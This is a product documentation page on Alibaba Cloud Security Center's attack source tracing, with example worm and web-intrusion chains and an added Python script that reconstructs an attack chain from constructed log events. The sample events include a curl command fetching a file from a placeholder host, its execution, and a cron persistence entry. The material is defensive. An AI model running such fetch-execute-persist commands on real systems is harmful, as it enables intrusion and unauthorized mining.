This topic describes the attack source tracing feature of Security Center. This feature automatically traces the sources of attack events and provides original data previews.

Background information

The attack source tracing feature processes, aggregates, and visualizes logs from various Alibaba Cloud services by using the big data analysis engine. The attack source tracing feature generates a chain diagram of intrusions, which you can use to find the sources of intrusions and make informed decisions at the earliest opportunity. You can use this feature in scenarios that require urgent response and source tracing, such as web intrusions, worm events, ransomware, and unauthorized communications to suspicious sources in the cloud.

Security Center generates a chain of automated attack source tracing 10 minutes after a threat is detected. We recommend that you view the attack source tracing information 10 minutes after an alert is generated.

This feature can trace the sources of all types of alerts. For more information, see Alert types.

Note Three months after an alert is triggered, the attack source tracing information about the security event that triggered the alert is automatically deleted. View the attack source tracing information about security events in a timely manner.

Limits

  • Attack source tracing is implemented based on the big data analysis engine. If attacks do not form an attack chain, the attack source tracing information may not be displayed. In this case, you can directly view details about the alerts.
  • Security Center automatically handles some alerts, such as alerts that are triggered by malicious processes, and sets the status of these alerts to Blocked. By default, attack source tracing information is not provided for malicious processes, because Security Center cannot trace the sources of malicious processes.

Procedure

  1. Log on to the Security Center console.
  2. In the left-side navigation pane, click Detection > Alerts.
  3. On the Alerts page, find the alert event and click the Attack Source Tracing icon.
    Figure: Diagnosis

    Click the Diagnosis tab to view the attack name, attack type, attack request details, affected resources, source IP address, and HTTP request details.

    Figure: The Diagnosis tab

    On the Diagnosis tab, you can view the information about each node in the chain diagram of the attack source tracing event. Click a node. On the Node Attributes page, you can view details about the node.

    Figure: Node details

Attack source tracing examples

  • Worm propagation events
    The following figure shows the source IP address of a worm propagation event: 185.234.*.*. The attacker uses SSH brute-force attacks to log on to the server, and then runs the curl command from Bash to download and run mining programs on the server.
    Figure: Worm propagation
  • Web intrusion events
    The following figure shows the source IP address of a web intrusion event: 202.144.*.*. The attacker exploits web vulnerabilities to insert webshells and mining programs into the Linux server. Meanwhile, the attacker writes to the crond configuration to make the attack persistent. The node information on the Diagnosis tab helps you understand this process more clearly. On the Diagnosis tab, you can view the multiple IP addresses used by the attacker and the URLs of the malicious download sources.
    Figure: Web intrusion
    Click an HTTP attack node to view its details. Traffic data indicates that the attacker exploited an unauthorized-access vulnerability in Apache Solr to call API operations and run system commands. To block the attack, we recommend that you fix the vulnerability so that similar attacks cannot succeed in the future.
    Figure: View nodes
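The following script is an added, simplified illustration of the idea behind an attack chain as described in the background information and in the worm propagation example above: host events are sorted by time and linked into entry, download, execution and persistence steps. It is not Security Center's own code and does not use its engine or APIs; the event format, the IP addresses (taken from the RFC 5737 documentation ranges), the download URL and the command lines are all constructed for this example.

```python
"""Reconstruct a simple attack chain from constructed host events.

Added example, not part of Security Center. The event schema, thresholds
and all sample values below are assumptions made for illustration.
"""
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Tuple

@dataclass
class Event:
    ts: int            # seconds since an arbitrary epoch
    kind: str          # "ssh_fail", "ssh_ok", "proc" or "cron_write"
    src_ip: str = ""   # for ssh_* events
    pid: int = 0       # for proc events
    ppid: int = 0      # for proc events
    cmd: str = ""      # for proc and cron_write events

BRUTE_FORCE_THRESHOLD = 5            # failures before a success counts as brute force
DOWNLOADERS = ("curl", "wget")       # commands treated as a download step

def find_brute_force_logins(events: List[Event]) -> Dict[str, int]:
    """Return {src_ip: ts} for successful logins preceded by many failures."""
    fails: Counter = Counter()
    logins: Dict[str, int] = {}
    for e in sorted(events, key=lambda ev: ev.ts):
        if e.kind == "ssh_fail":
            fails[e.src_ip] += 1
        elif e.kind == "ssh_ok" and fails[e.src_ip] >= BRUTE_FORCE_THRESHOLD:
            logins.setdefault(e.src_ip, e.ts)
    return logins

def build_attack_chain(events: List[Event]) -> List[Tuple[str, str]]:
    """Link events into (step, detail) pairs: entry -> download -> execute -> persist."""
    events = sorted(events, key=lambda ev: ev.ts)
    chain: List[Tuple[str, str]] = []
    entries = find_brute_force_logins(events)
    if not entries:
        return chain                                 # no chain without an entry point
    src_ip, login_ts = min(entries.items(), key=lambda kv: kv[1])
    chain.append(("entry", f"SSH brute force from {src_ip}"))
    procs = [e for e in events if e.kind == "proc" and e.ts >= login_ts]
    for e in procs:
        if e.cmd.split()[0] in DOWNLOADERS:
            chain.append(("download", e.cmd))
            # Programs later started by the same parent shell are treated as execution
            # of what was downloaded (a heuristic; real engines track file provenance).
            for child in procs:
                if child.ppid == e.ppid and child.ts > e.ts:
                    chain.append(("execute", child.cmd))
            break
    for e in events:
        if e.kind == "cron_write" and e.ts >= login_ts:
            chain.append(("persist", e.cmd))
    return chain

# Constructed sample: noise from one address, brute force from another, then
# a shell that downloads and runs a program and installs a cron entry.
SAMPLE_EVENTS = [
    Event(1, "ssh_fail", src_ip="198.51.100.9"),
    Event(2, "ssh_fail", src_ip="198.51.100.9"),
] + [Event(t, "ssh_fail", src_ip="203.0.113.5") for t in range(3, 9)] + [
    Event(9, "ssh_ok", src_ip="203.0.113.5"),
    Event(10, "proc", pid=100, ppid=1, cmd="bash"),
    Event(11, "proc", pid=101, ppid=100, cmd="curl -o /tmp/x http://example.invalid/x"),
    Event(12, "proc", pid=102, ppid=100, cmd="/tmp/x"),
    Event(13, "cron_write", cmd="* * * * * /tmp/x"),
]

if __name__ == "__main__":
    for step, detail in build_attack_chain(SAMPLE_EVENTS):
        print(f"{step:>8}: {detail}")
```

The chain is only as good as the events fed into it: without the SSH login records, the download and execution steps have no entry point to attach to, which mirrors the limit above that tracing information is not shown when attacks do not form a chain.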